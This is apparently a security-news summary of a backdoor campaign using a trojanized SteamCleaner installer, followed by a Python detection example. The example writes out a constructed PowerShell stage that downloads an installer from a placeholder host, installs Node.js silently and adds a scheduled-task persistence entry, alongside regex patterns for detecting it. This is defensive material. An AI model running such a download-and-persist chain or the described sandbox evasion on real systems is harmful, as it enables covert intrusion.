A sophisticated backdoor malware campaign is exploiting a weaponized version of SteamCleaner to compromise Windows systems. SteamCleaner is a legitimate utility for removing junk files left behind by the Steam gaming platform; the trojanized build has been altered to include malicious code. Attackers distribute it through fraudulent websites disguised as software repositories. Users looking for cracked software unknowingly download the malicious installer, which is signed with a valid digital certificate and therefore runs without raising initial alarms.
Once executed, the malware installs itself in its designated directory and performs extensive environment checks to detect sandboxes. When a sandbox is detected, it keeps running but performs only benign operations, so automated analysis sees nothing malicious. Payload delivery relies on encrypted PowerShell commands that install Node.js and then download additional malicious scripts. These scripts establish communication with command-and-control servers, enabling remote command execution, and maintain persistence through the Windows Task Scheduler.
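A defender-side illustration of the chain described above, added here as an example and not code from the article or from any vendor report: it scans constructed process-creation records (hypothetical, built for this example) for a PowerShell child process carrying an -EncodedCommand payload, decodes it, and flags the combination of a download, a Node.js installer and a schtasks persistence entry. The article only says the commands were "encrypted"; treating them as base64-encoded PowerShell is an assumption, as are the process names and paths used in the sample records.

```python
import base64
import re
from typing import Optional

def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed stage script, written for this example only; it mimics the
# download -> Node.js install -> scheduled-task chain the article describes.
STAGE_SCRIPT = ("Invoke-WebRequest https://example.invalid/node.msi -OutFile $env:TEMP\\node.msi; "
                "msiexec /i $env:TEMP\\node.msi /qn; "
                "schtasks /create /tn Updater /tr \"node $env:TEMP\\agent.js\" /sc onlogon")

# Constructed process-creation records (not real telemetry): (parent, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "SteamCleaner.exe", "SteamCleaner.exe"),
    ("SteamCleaner.exe", "powershell.exe",
     "powershell.exe -w hidden -EncodedCommand " + encode_ps(STAGE_SCRIPT)),
    ("explorer.exe", "powershell.exe", "powershell.exe Get-Date"),  # benign, should not fire
]

# PowerShell accepts abbreviated parameter names, so match the common prefixes too.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviours that together describe the chain; any one alone is weak evidence.
INDICATORS = {
    "download": re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|curl\s", re.I),
    "node_install": re.compile(r"node(?:js)?(?:\.msi|\.exe)|msiexec .*node", re.I),
    "scheduled_task": re.compile(r"schtasks\s+/create|Register-ScheduledTask", re.I),
}

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_events(events):
    """Flag encoded PowerShell launches whose decoded script shows chain behaviours."""
    findings = []
    for parent, image, cmdline in events:
        if image.lower() != "powershell.exe":
            continue
        decoded = decode_encoded_command(cmdline)
        if decoded is None:
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        if hits:
            findings.append({"parent": parent, "hits": hits, "decoded": decoded})
    return findings
```

The parent process of the flagged PowerShell launch (here the installer itself) is what ties the detection back to the trojanized utility rather than to any encoded command an administrator might run.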
Read the original: Cyber Security News